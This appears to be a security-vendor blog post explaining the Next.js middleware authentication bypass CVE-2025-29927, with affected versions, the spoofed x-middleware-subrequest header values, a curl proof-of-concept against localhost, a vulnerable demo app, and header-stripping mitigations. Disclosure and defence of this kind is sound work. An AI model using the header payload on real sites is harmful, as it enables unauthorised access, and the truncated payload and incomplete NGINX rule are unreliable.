The Critical Severity Vulnerability in the Next.js Framework (CVE-2025-29927)

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 5.00 out of 5)
Loading...
Critical Next.js Vulnerability

One of the most famous JavaScript frameworks, “Next.Js,” has critical security with a CVE base score of 9.1 by NIST. Next.js is a React framework that provides a structured approach and additional features for building web applications, including server-side rendering and static site generation, built on top of the React library.

The framework is used by Big tech companies and even small startups because of its performance, scalability, and developer-friendly features.

The security researcher Rachid discovered a critical vulnerability in the Next.js Middleware. This vulnerability allows authentication bypass, DOS (Denial of Server), and Cache poising with maliciously crafted URLs.

The framework has 131K stars on GitHub and is currently downloaded + 9,4 million times per week. The following Next.js version is vulnerable to this vulnerability.

If your organization uses it, upgrade it to the corresponding patched version.

  1. For Next.js 15.x, this issue is fixed in 15.2.3.
  2. For Next.js 14.x, this issue is fixed in 14.2.25.
  3. All Next.js versions starting from 11.1.4 up to and including 13.5.6 are affected by this vulnerability.

How does this Vulnerability Occur?

To understand the technicality of this vulnerability, you first have to understand Middleware. According to the Next.js documentation, Middleware allows you to run code before a request is completed.

Then, based on the incoming request, you can modify the response by rewriting, redirecting, modifying the request or response headers, or responding directly. Middleware runs before cached content and routes are matched.

In simple words, Middleware acts as a checkpoint for your website. Before a request reaches the final destination (like your homepage or a product page), middleware checks the request and decides what to do next. Middleware helps you customize how requests are handled, making your site faster, safer, and more flexible.

Another main job of the  Middleware is access control. It checks for Authentication & Authorization and verifies their session before letting them in.

For Example, A user tries to visit  /<Your web app>/dashboard/admin. Middleware jumps in and Check if they’re logged in and have the correct permissions. If yes, Allow them through if everything is good; otherwise, Redirect them to the login page if they don’t have access.

The Security Issue in Next.js

The Next.js framework middleware checks a special header in the web requests called x-middleware-subrequest to decide whether it should run. If this header contains the middleware’s name, the middleware is ignored, and the request moves forward. Apart from this, the Middleware’s name is predictable.

The files had to be named _middleware.ts and placed inside the pages/ folder. The attacker can bypass the middleware and the login mechanism by chaining them together.

Here is how it is if a request needs to pass through middleware at /dashboard/panel/admin, an attacker has three possible values for the x-middleware-subrequest header.

  • pages/_middleware
  • pages/dashboard/_middleware
  • pages/dashboard/panel/_middleware

The Middleware Vulnerability POC

There are multiple versions of the next js that are vulnerable to this vulnerability, so different Project Structures Need Different Ways to Exploit it:

Pages Router (versions 11.1.4-12.1.x): x-middleware-subrequest: pages/_middleware

App Router (versions 12.2.x-13.x): x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

App Router with /src folder (versions 14.x-15.2.2): x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middlewar

    The simple payload to version 15.x. If you run the following curl command, it bypasses the middleware and gives you login access.

    The Exploit (middleware: middleware: middleware: middleware: middleware)

    curl -v -H “x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware” \

    http://localhost:3000/dashboard

    If you are looking for a vulnerable app for testing and learning purposes, use this GitHub repo. Follow the steps to deploy the vulnerable app:

    Step 1: git clone https://github.com/Pkhuyar/nextjs-vulnerable-app.git
Step 2: cd nextjs-auth-app
Step 3: npm install
Step 4: npm run dev

    The vulnerable web app is running on http://localhost:3000 open it in the browser to view the application.

    Real-World Security Impacts

    The vulnerability opens several new attacks surface to the Next.js web app. These real-life scenarios occur if your app is vulnerable to this vulnerability:

    Authentication Bypass: The attacker can bypass the login pages and gain access to that user with a simple crafted request. The worst case scenario occurs when an attacker gains access to a high-privilege user account such as admin.

    CSP (Content Security Policy) Bypass: The middleware also sets a CSP header as a defense mechanism for XSS (cross-site scripting) attacks. Now, attackers can also execute malicious XSS payloads on the victim.

    Cache Poising and DOS: The security researcher also claims that in some scenarios, this vulnerability can cause a cache poisoning attack or the Denial of service.

    Geographic Restrictions Bypass: The developer uses middleware to restrict content by location. If someone uses this vulnerability to exploit the web app, they can bypass this security mechanism.

      Protecting Your Organisation

      The vulnerability occurred recently, so fix your web as soon as possible. Now, vulnerability and exploitation are publicly available. Cybercriminals use it to exploit web apps in the wild.

      If you also use the Next.js framework, protect your organization by following these steps:

      Update Next.js: The Next.js team released a patch for this vulnerability. Update your Next.js app immediately if you are on the list of vulnerable versions of Next.js.

      Use WAF (Web Application Firewall) to malicious Header: If you can’t update your web app immediately or don’t know if you are under the vulnerable list, Use a good WAD to block dangerous security headers.

        For NGINX: nginxCopylocation / { proxy_set_header x-middleware-subrequest

        For Apache: apacheCopyRequestHeader unset x-middleware-subrequest

        Conclusion

        This incident reminds us that security is an ongoing process; it is not like we did a one-time setup and it is all done. The popular and well-maintained framework also faces critical vulnerability.

        We need multiple layers of security to prevent this kind of incident. Use SiteLock Security to add an extra layer of security. It is a cloud-based security tool that scans your website for malware and vulnerabilities and protects your organization from this type of incident.

        One of the famous quotes in the cybersecurity world is, “Never trust user input.” Any data from users, including HTTP headers – can be manipulated. Always validate or sanitize input.

        Janki Mehta

        Janki Mehta

        Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.